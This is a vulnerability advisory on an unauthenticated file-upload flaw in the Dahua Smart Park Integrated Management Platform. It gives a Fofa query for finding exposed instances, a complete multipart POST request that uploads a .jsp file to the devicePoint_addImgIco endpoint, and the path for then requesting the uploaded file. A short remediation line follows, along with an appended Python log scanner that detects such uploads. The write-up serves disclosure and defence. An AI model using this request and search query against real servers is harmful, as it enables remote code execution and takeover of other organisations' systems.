Dahua Smart Park Integrated Management Platform devicePoint_addImgIco File Upload Vulnerability
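0x01 Vulnerability description:
The devicePoint_addImgIco endpoint of the Dahua Smart Park Integrated Management Platform places no restrictions on the files users upload. This allows an unauthenticated remote attacker to upload arbitrary files and, in turn, execute arbitrary commands to gain control of the server.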
0x02 Search query:
Fofa:body="/WPMS/asset/lib/normalize.css"

0x03 Reproduction:
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: your-ip
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 243
Connection: close

--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="222.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

asd
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--

Build the access URL from the upload path and request it:
http://your-ip/upload/emap/society_new/xxxxxx.jsp

0x04 Remediation:
Remove the platform from internet exposure, or enforce access control on the interface.
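
For triage alongside the remediation above, the following added example (not part of the original write-up or of any vendor tooling) scans web access logs for POSTs to the upload endpoint and for requests to JSP files under the upload directory named in section 0x03. It assumes combined-log-format lines; the function name, finding labels and sample log lines are constructed for illustration.

```python
import re

# Assumed format: ip - - [ts] "METHOD path HTTP/x" status size (combined log)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Endpoint and upload directory as given on this page
UPLOAD_PATH = "/emap/devicePoint_addImgIco"
# An image-icon directory should never serve server-side script files
DROPPED_RE = re.compile(r"^/upload/emap/society_new/[^/]+\.jspx?$", re.I)


def scan(lines):
    """Return (line_no, client_ip, finding, http_status) tuples."""
    findings = []
    uploaders = set()  # clients already seen POSTing to the upload endpoint
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        path = m["path"].split("?", 1)[0]  # ignore the query string
        status = int(m["status"])
        if m["method"] == "POST" and path == UPLOAD_PATH:
            uploaders.add(m["ip"])
            findings.append((n, m["ip"], "upload-endpoint", status))
        elif DROPPED_RE.match(path):
            # Same client uploading then fetching a JSP is the stronger signal
            kind = "jsp-after-upload" if m["ip"] in uploaders else "jsp-in-upload-dir"
            findings.append((n, m["ip"], kind, status))
    return findings


# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE = [
    '198.51.100.7 - - [12/Aug/2024:10:01:02 +0800] "GET /WPMS/asset/lib/normalize.css HTTP/1.1" 200 1820',
    '198.51.100.7 - - [12/Aug/2024:10:01:05 +0800] "POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1" 200 96',
    '198.51.100.7 - - [12/Aug/2024:10:01:09 +0800] "GET /upload/emap/society_new/ico_constructed.jsp HTTP/1.1" 200 3',
    '203.0.113.9 - - [12/Aug/2024:11:30:00 +0800] "GET /upload/emap/society_new/logo.png HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Aug/2024:11:30:04 +0800] "GET /upload/emap/society_new/other.JSP?x=1 HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A 200 response to a JSP under the upload directory warrants checking the directory on disk for files that are not images; the POST findings alone only show that the endpoint was reachable.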
